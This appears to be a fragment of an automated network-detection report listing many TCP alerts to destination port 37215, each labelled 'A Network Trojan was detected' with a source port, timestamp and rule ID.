                  Source Port:44192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.514091
                  SID:2829579
                  Source Port:46882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.935220
                  SID:2835222
                  Source Port:37836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.762388
                  SID:2829579
                  Source Port:56678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.510800
                  SID:2835222
                  Source Port:56426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.391296
                  SID:2829579
                  Source Port:35750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.325101
                  SID:2835222
                  Source Port:47598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595631
                  SID:2829579
                  Source Port:43532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.649954
                  SID:2835222
                  Source Port:48676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.792743
                  SID:2835222
                  Source Port:43134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.351340
                  SID:2829579
                  Source Port:46310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.433410
                  SID:2829579
                  Source Port:45694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373070
                  SID:2835222
                  Source Port:51964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.462322
                  SID:2835222
                  Source Port:45002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.457605
                  SID:2829579
                  Source Port:48056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.619862
                  SID:2835222
                  Source Port:40402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.276755
                  SID:2835222
                  Source Port:44172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.360757
                  SID:2829579
                  Source Port:52178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.284059
                  SID:2835222
                  Source Port:57694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.951941
                  SID:2829579
                  Source Port:47434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.885713
                  SID:2835222
                  Source Port:33280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.528287
                  SID:2829579
                  Source Port:55512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.554051
                  SID:2829579
                  Source Port:36616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.790374
                  SID:2829579
                  Source Port:42452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.550516
                  SID:2835222
                  Source Port:45322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.222748
                  SID:2835222
                  Source Port:53582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189899
                  SID:2829579
                  Source Port:52132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.708629
                  SID:2829579
                  Source Port:60968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.825720
                  SID:2829579
                  Source Port:52412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.477490
                  SID:2829579
                  Source Port:51414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.030907
                  SID:2829579
                  Source Port:52420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.191289
                  SID:2835222
                  Source Port:58006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.562069
                  SID:2835222
                  Source Port:34402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.332526
                  SID:2829579
                  Source Port:36248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.026941
                  SID:2835222
                  Source Port:53868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.053236
                  SID:2835222
                  Source Port:44930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.675779
                  SID:2829579
                  Source Port:60802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.059719
                  SID:2835222
                  Source Port:50208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.237897
                  SID:2835222
                  Source Port:40124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.449292
                  SID:2829579
                  Source Port:58380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.347149
                  SID:2829579
                  Source Port:51782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.613127
                  SID:2835222
                  Source Port:45824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.859922
                  SID:2835222
                  Source Port:60826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.915433
                  SID:2829579
                  Source Port:34204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.139461
                  SID:2835222
                  Source Port:54996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.632458
                  SID:2835222
                  Source Port:48890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.439575
                  SID:2829579
                  Source Port:41576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.920662
                  SID:2829579
                  Source Port:39174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.798574
                  SID:2835222
                  Source Port:41010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.126957
                  SID:2829579
                  Source Port:47190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.191310
                  SID:2829579
                  Source Port:55258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.956577
                  SID:2835222
                  Source Port:47774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.931527
                  SID:2829579
                  Source Port:55412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.415426
                  SID:2829579
                  Source Port:45138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.990373
                  SID:2829579
                  Source Port:57062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.027380
                  SID:2829579
                  Source Port:54122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.743815
                  SID:2829579
                  Source Port:46844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.351608
                  SID:2835222
                  Source Port:49038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.084652
                  SID:2829579
                  Source Port:34748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.611968
                  SID:2835222
                  Source Port:52276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.559179
                  SID:2835222
                  Source Port:49806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.950899
                  SID:2829579
                  Source Port:35874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.189850
                  SID:2835222
                  Source Port:47550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460857
                  SID:2835222
                  Source Port:37584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.355450
                  SID:2829579
                  Source Port:50696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.369458
                  SID:2829579
                  Source Port:59936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761969
                  SID:2829579
                  Source Port:44748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.953100
                  SID:2835222
                  Source Port:47754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.999668
                  SID:2829579
                  Source Port:48038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202550
                  SID:2829579
                  Source Port:51986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.417902
                  SID:2829579
                  Source Port:59108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.633265
                  SID:2829579
                  Source Port:58648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:44.496105
                  SID:2829579
                  Source Port:40922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.714672
                  SID:2829579
                  Source Port:48132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.013363
                  SID:2829579
                  Source Port:44498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.151751
                  SID:2829579
                  Source Port:35208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.013790
                  SID:2835222
                  Source Port:46992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102149
                  SID:2835222
                  Source Port:44994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.919231
                  SID:2829579
                  Source Port:42328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.602369
                  SID:2835222
                  Source Port:34250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.931726
                  SID:2835222
                  Source Port:49202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.558388
                  SID:2829579
                  Source Port:49564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.537830
                  SID:2829579
                  Source Port:59044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.429054
                  SID:2829579
                  Source Port:48120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.320405
                  SID:2835222
                  Source Port:54286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.106288
                  SID:2835222
                  Source Port:50990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.518150
                  SID:2835222
                  Source Port:33846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.199033
                  SID:2835222
                  Source Port:39486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.105620
                  SID:2829579
                  Source Port:34696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.273376
                  SID:2829579
                  Source Port:58548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.549357
                  SID:2835222
                  Source Port:59630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.412388
                  SID:2835222
                  Source Port:48214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.863618
                  SID:2829579
                  Source Port:35868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.586352
                  SID:2835222
                  Source Port:59824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460517
                  SID:2835222
                  Source Port:36332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.421240
                  SID:2829579
                  Source Port:34902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.865935
                  SID:2829579
                  Source Port:53574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.904329
                  SID:2829579
                  Source Port:34990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.310052
                  SID:2829579
                  Source Port:51814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.934350
                  SID:2829579
                  Source Port:36882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989759
                  SID:2829579
                  Source Port:47136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.223283
                  SID:2835222
                  Source Port:52858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.968526
                  SID:2835222
                  Source Port:48250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.375796
                  SID:2835222
                  Source Port:41300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.827757
                  SID:2835222
                  Source Port:50902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.632406
                  SID:2829579
                  Source Port:55472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.479791
                  SID:2829579
                  Source Port:54998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.057474
                  SID:2835222
                  Source Port:41228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.068814
                  SID:2829579
                  Source Port:59168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.586309
                  SID:2829579
                  Source Port:45494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.879570
                  SID:2835222
                  Source Port:45196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.239188
                  SID:2829579
                  Source Port:51358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.766466
                  SID:2829579
                  Source Port:60408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.644791
                  SID:2835222
                  Source Port:43516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.812412
                  SID:2829579
                  Source Port:45966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.596695
                  SID:2835222
                  Source Port:56386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.877445
                  SID:2835222
                  Source Port:53620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.881889
                  SID:2835222
                  Source Port:39648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.098381
                  SID:2835222
                  Source Port:45648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.907599
                  SID:2835222
                  Source Port:43956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.403312
                  SID:2835222
                  Source Port:52372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.081340
                  SID:2835222
                  Source Port:45988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.933936
                  SID:2835222
                  Source Port:32876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.421188
                  SID:2829579
                  Source Port:56550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.970965
                  SID:2829579
                  Source Port:46584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.483064
                  SID:2835222
                  Source Port:59618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.256759
                  SID:2835222
                  Source Port:35206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.373559
                  SID:2835222
                  Source Port:34590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.834166
                  SID:2835222
                  Source Port:56694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.141493
                  SID:2829579
                  Source Port:42998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.593421
                  SID:2829579
                  Source Port:46810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.406060
                  SID:2829579
                  Source Port:35542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.011560
                  SID:2829579
                  Source Port:38408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.379030
                  SID:2835222
                  Source Port:40858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.777206
                  SID:2829579
                  Source Port:55500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.729684
                  SID:2829579
                  Source Port:42844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.658775
                  SID:2829579
                  Source Port:57534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.526388
                  SID:2829579
                  Source Port:56490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.318563
                  SID:2835222
                  Source Port:46534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.924312
                  SID:2835222
                  Source Port:35470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.668084
                  SID:2835222
                  Source Port:39794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.090916
                  SID:2829579
                  Source Port:42144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981659
                  SID:2829579
                  Source Port:35144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.664334
                  SID:2835222
                  Source Port:56594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.132351
                  SID:2835222
                  Source Port:46834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.751989
                  SID:2835222
                  Source Port:57828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.896369
                  SID:2829579
                  Source Port:54810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.856706
                  SID:2829579
                  Source Port:58340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.490604
                  SID:2835222
                  Source Port:60922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.807445
                  SID:2835222
                  Source Port:35676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.820955
                  SID:2835222
                  Source Port:45570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.243243
                  SID:2835222
                  Source Port:45714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243765
                  SID:2835222
                  Source Port:48786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839204
                  SID:2829579
                  Source Port:36534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.960962
                  SID:2835222
                  Source Port:52796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.148084
                  SID:2829579
                  Source Port:41042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989759
                  SID:2835222
                  Source Port:36658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.553454
                  SID:2835222
                  Source Port:45858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911510
                  SID:2835222
                  Source Port:43192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.888639
                  SID:2835222
                  Source Port:38524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.801528
                  SID:2835222
                  Source Port:38852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.516253
                  SID:2835222
                  Source Port:46070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.407973
                  SID:2829579
                  Source Port:42184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.786219
                  SID:2829579
                  Source Port:47322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.124303
                  SID:2835222
                  Source Port:33280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.527963
                  SID:2835222
                  Source Port:44112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.372864
                  SID:2835222
                  Source Port:36138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.529437
                  SID:2829579
                  Source Port:45752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.608581
                  SID:2829579
                  Source Port:36658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.239343
                  SID:2829579
                  Source Port:55772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.526577
                  SID:2829579
                  Source Port:46352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771474
                  SID:2829579
                  Source Port:35844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.205499
                  SID:2829579
                  Source Port:37280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2829579
                  Source Port:36496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.066193
                  SID:2835222
                  Source Port:49128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.002515
                  SID:2835222
                  Source Port:35714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.918305
                  SID:2829579
                  Source Port:41996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.508091
                  SID:2829579
                  Source Port:38076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.929334
                  SID:2829579
                  Source Port:49750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.874672
                  SID:2835222
                  Source Port:47956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.432411
                  SID:2829579
                  Source Port:49244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532374
                  SID:2835222
                  Source Port:52304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.966611
                  SID:2835222
                  Source Port:48256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.920658
